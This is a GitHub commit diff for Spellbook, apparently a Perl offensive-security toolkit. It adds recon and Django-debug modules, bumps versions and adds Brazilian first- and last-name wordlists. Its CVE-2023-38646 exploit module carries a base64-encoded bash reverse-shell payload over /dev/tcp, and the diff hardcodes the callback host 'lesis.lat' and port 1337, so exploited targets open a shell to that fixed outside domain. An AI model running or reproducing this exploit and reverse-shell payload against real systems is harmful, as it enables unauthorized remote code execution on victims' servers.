Develop (#112)

* remove duplicate module * new module * fixes and more flexibility * change name of the module * notes * add a new pattern to detect more cases * draft module * Add the new Django_DEBUG.pm file (#78) * Sync (#67) * new module to identify technologies from a web page * added https string * added trigger based on pull request * Add the new Django_DEBUG.pm file --------- Co-authored-by: Heitor Gouvêa <[email protected]> * update version * fix code style and improve some parts * fix reverse shell payload * new wordlists * update version * change email * rename module --------- Co-authored-by: Katashi <[email protected]>
htrgouvea · Oct 31, 2024 · 8018270 · 8018270
1 parent 8787a73
commit 8018270
Show file tree

Hide file tree

Showing 9 changed files with 384 additions and 8 deletions.
diff --git a/.config/modules.json b/.config/modules.json
@@ -377,6 +377,18 @@
             "category": "advisory",
             "module": "CVE_2024_4577",
             "description": "PHP CGI Argument Injection vulnerability"
+        },
+        {
+            "id": "0063",
+            "category": "exploit",
+            "module": "Django_Debug",
+            "description": "Detect if a Django application has the debug mode enabled"
+        },
+        {
+            "id": "0064",
+            "category": "recon",
+            "module": "Technologies",
+            "description": "Use wappalyzer to detect technologies from a website"
         }
     ]
 }
diff --git a/README.md b/README.md
@@ -7,7 +7,7 @@
       <img src="https://img.shields.io/badge/license-MIT-blue.svg">
     </a>
     <a href="https://github.com/htrgouvea/spellbook/releases">
-      <img src="https://img.shields.io/badge/version-0.3.3-blue.svg">
+      <img src="https://img.shields.io/badge/version-0.3.6-blue.svg">
     </a>
       <br/>
     <img src="https://github.com/htrgouvea/spellbook/actions/workflows/linter.yml/badge.svg">
@@ -44,7 +44,7 @@ $ cpanm --installdeps .
 ### How to use
 
 ```
-Spellbook v0.3.3
+Spellbook v0.3.6
 Core Commands
 ==============
 	Command          Description

diff --git a/SECURITY.md b/SECURITY.md
@@ -1,6 +1,6 @@
 # Security Policy
 
-If you find a security issue, please DO NOT submit it via the issue tracker! Instead, please follow responsible disclosure practices and send information about security issues directly to [hi@heitorgouvea.me](mailto:hi@heitorgouvea.me) so that a proper assessment can be made and a fix prepared before a wide announcement. You will receive an acknowledgement within 24 hours.
+If you find a security issue, please DO NOT submit it via the issue tracker! Instead, please follow responsible disclosure practices and send information about security issues directly to [security@heitorgouvea.me](mailto:security@heitorgouvea.me) so that a proper assessment can be made and a fix prepared before a wide announcement. You will receive an acknowledgement within 24 hours.
 
 Even in cases where you have limited or incomplete information, or you're not sure whether or not a problem constitutes a security issue, please make contact as soon as possible. We can work together to investigate, debug, and assess.
 

diff --git a/files/top100-brazilian-lastnames.txt b/files/top100-brazilian-lastnames.txt
@@ -0,0 +1,100 @@
+silva
+santos
+oliveira
+souza
+lima
+almeida
+costa
+pereira
+rodrigues
+ferreira
+carvalho
+gomes
+ribeiro
+martins
+alves
+rocha
+dias
+martins
+almeida
+mendes
+pires
+barros
+ferreira
+nascimento
+correia
+teixeira
+mendes
+lima
+cardoso
+andrade
+ferreira
+monteiro
+ribeiro
+martins
+nunes
+castro
+azevedo
+mendes
+santos
+barreto
+vieira
+tavares
+matos
+frança
+figueiredo
+maia
+paiva
+brito
+rios
+araújo
+santos
+cunha
+queiroz
+neves
+lemos
+gomes
+ribeiro
+teles
+lima
+silva
+barros
+martins
+moura
+rocha
+almeida
+oliveira
+costa
+dias
+lopes
+pacheco
+salgado
+martins
+rocha
+oliveira
+lima
+campos
+araújo
+cunha
+teixeira
+almeida
+leite
+ribeiro
+lopes
+macedo
+moreira
+pinto
+lima
+pires
+queiroz
+santos
+brito
+oliveira
+cardoso
+andrade
+martins
+soares
+nascimento
+cordeiro
+faria
+nascimento
diff --git a/files/top210-brazilian-names.txt b/files/top210-brazilian-names.txt
@@ -0,0 +1,210 @@
+adriana
+adriano
+alan
+alana
+alanys
+alessandra
+alessandro
+alice
+aline
+amanda
+amaro
+ana
+ana beatriz
+ana clara
+anderson
+andre
+andrea
+angela
+antonia
+arthur
+beatriz
+betania
+beto
+bianca
+brenda
+bruna
+bruno
+caio
+camila
+carla
+carlos
+carol
+caroline
+cecilia
+cintia
+clara
+claudia
+claudio
+cleber
+cleusa
+cora
+cristiano
+daiane
+daniel
+daniela
+daniele
+daniella
+danilo
+davi
+debora
+denise
+diego
+douglas
+edson
+elaine
+elena
+eliane
+elias
+elisa
+eloisa
+emilly
+emily
+erika
+evandro
+evelyn
+fabiana
+fabio
+fagner
+felipe
+fernanda
+fernando
+flavia
+flavio
+francisco
+gabriel
+gabriele
+giovanna
+giovanni
+giselle
+guilherme
+gustavo
+heitor
+helena
+igor
+isabella
+ivan
+ivete
+jaime
+jamil
+janaina
+janderson
+jaqueline
+jessica
+joana
+joao
+joão pedro
+joel
+joelma
+jorge
+jose
+julia
+julian
+juliana
+juliane
+juliano
+julio
+junior
+karla
+katia
+kelly
+lais
+lara
+larissa
+laura
+leandro
+leila
+leticia
+liana
+luan
+luana
+lucas
+luciana
+luis
+luiz
+maiara
+maicon
+maira
+marcelo
+marcia
+marcio
+marcos
+maria
+mariana
+mariane
+matheus
+mauricio
+michelle
+mikael
+miranda
+miriam
+murilo
+nadja
+nascimento
+nátaly
+natasha
+nathalia
+nicolas
+nicoly
+nilson
+orlando
+otavio
+patricia
+paula
+paulo
+pedro
+priscila
+rafael
+rafaela
+raquel
+raul
+regina
+renan
+renata
+renato
+ricardo
+rita
+roberta
+roberto
+robson
+rodolfo
+rodrigo
+ronaldo
+roni
+rony
+rosaline
+ruan
+ruy
+sabrina
+samanta
+samara
+sandro
+sergio
+sheila
+simone
+sofia
+sonia
+tainara
+tais
+talita
+tamires
+tânia
+tatiane
+thais
+thiago
+thierry
+tiago
+tomas
+valentina
+valeria
+vanessa
+vera
+veronica
+victor
+victoria
+vinicius
+vivian
+viviane
+wellington
+willian
+heverton
diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm
@@ -9,7 +9,10 @@ package Spellbook::Advisory::CVE_2023_38646 {
 
     sub new {
         my ($self, $parameters) = @_;
-        my ($help, $target, $remote, $port, @result);
+        my ($help, $target, @result);
+
+        my $remote = 'lesis.lat';
+        my $port   = 1337;
 
         Getopt::Long::GetOptionsFromArray (
             $parameters,
@@ -34,7 +37,7 @@ package Spellbook::Advisory::CVE_2023_38646 {
 
                     if ($token) {
                         my $headers = HTTP::Headers -> new ("Content-Type" => "application/json");
-                        my $reverse = encode_base64("bash -i >&/dev/tcp/$remote/$port 0>&1", "");
+                        my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", "");
 
                         my $payload = qq({
                             "token": "$token",
@@ -60,7 +63,7 @@ package Spellbook::Advisory::CVE_2023_38646 {
                         my $response = $userAgent -> request($request);
 
                         if ($response -> code() == 400) {
-                            push @result, $target;
+                            push @result, "\n[+] $target exploited\n";
                         }
                     }
                 }

diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm
@@ -4,7 +4,7 @@ package Spellbook::Core::Helper {
 
 	sub new {
 		print "
-            \rSpellbook v0.3.4
+            \rSpellbook v0.3.6
             \rCore Commands
             \r==============
             \r\tCommand          Description